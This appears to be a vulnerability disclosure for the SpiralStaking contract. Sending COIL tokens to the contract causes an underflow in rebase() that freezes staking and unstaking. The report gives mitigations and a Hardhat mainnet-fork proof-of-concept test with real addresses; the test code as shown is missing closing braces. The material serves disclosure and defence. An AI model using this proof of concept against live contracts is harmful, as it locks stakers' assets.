Contract in scope: SpiralStaking
Vulnerable method: function rebase() public
Line of bug:, (totalSpiral * index / initialIndex) - Coil.balanceOf(address(this)));
Malicious or accidental sending of COIL tokens to this contract can lead to arithmetic underflow when Coil.balanceOf(address(this)) > (totalSpiral * index / initialIndex)
DoS of methods rebase
and subsequently stake/unstake
(calls rebase
), i.e. stakers assets are frozen in the contract.
Immediately: In case of this attack, set epoch.apr
to 0. This ensures that the vulnerable line is not executed and stakers can unstake.
New contract: Check for underflow with an additional if and only mint if necessary.
Attack Scenario
Anyone with enough COIL tokens can simply send them to the SpiralStaking contract such that Coil.balanceOf(address(this)) > (totalSpiral * index / initialIndex)
This is all it takes to facilitate the attack.
Proof of Concept
The whole Hardhat mainet fork PoC project is available upon request.
Here is the relevant typescript test code:
import type { SignerWithAddress } from "@nomiclabs/hardhat-ethers/dist/src/signer-with-address";
import { expect } from "chai";
import { ethers, network } from "hardhat";
import * as contracts from "../../src/types";
import { addBalance_ETH, impersonate, printBalance_ERC20, printBalance_ETH, sendToken_ERC20 } from "./helper";
describe("Attach to external contract", async function () {
let signer: SignerWithAddress;
let stakingContract: contracts.SpiralStaking;
before(async function () {
// address of external contract must be provided via env. variable
const contractAddress: string = <string>process.env.CONTRACT_ADDRESS;
const impersonateAddress: string = <string>process.env.IMPERSONATE_ADDRESS;
if (impersonateAddress) {
signer = await impersonate(impersonateAddress);
} else {
[signer] = await ethers.getSigners();
// PoC: fill attacker/signer account with 10 000 COIL
const contractCoil = "0x823E1B82cE1Dc147Bbdb25a203f046aFab1CE918";
const holderCoil = "0xAF4264916B467e2c9C8aCF07Acc22b9EDdDaDF33";
await sendToken_ERC20(contractCoil, holderCoil, signer.address, 10000);
stakingContract = await ethers.getContractAt("SpiralStaking", contractAddress, signer);
it("DoS attack", async function () {
// PoC: send 10 000 COIL to staking contract
const contractCoil = "0x823E1B82cE1Dc147Bbdb25a203f046aFab1CE918"
await sendToken_ERC20(contractCoil, signer.address, stakingContract.address, 10000);
// PoC: rebase DoS
await expect(stakingContract.connect(signer).rebase());
// skip 10 000 blocks
await network.provider.send("hardhat_mine", ["0x2710"]);
// PoC: rebase DoS
await expect(stakingContract.connect(signer).rebase());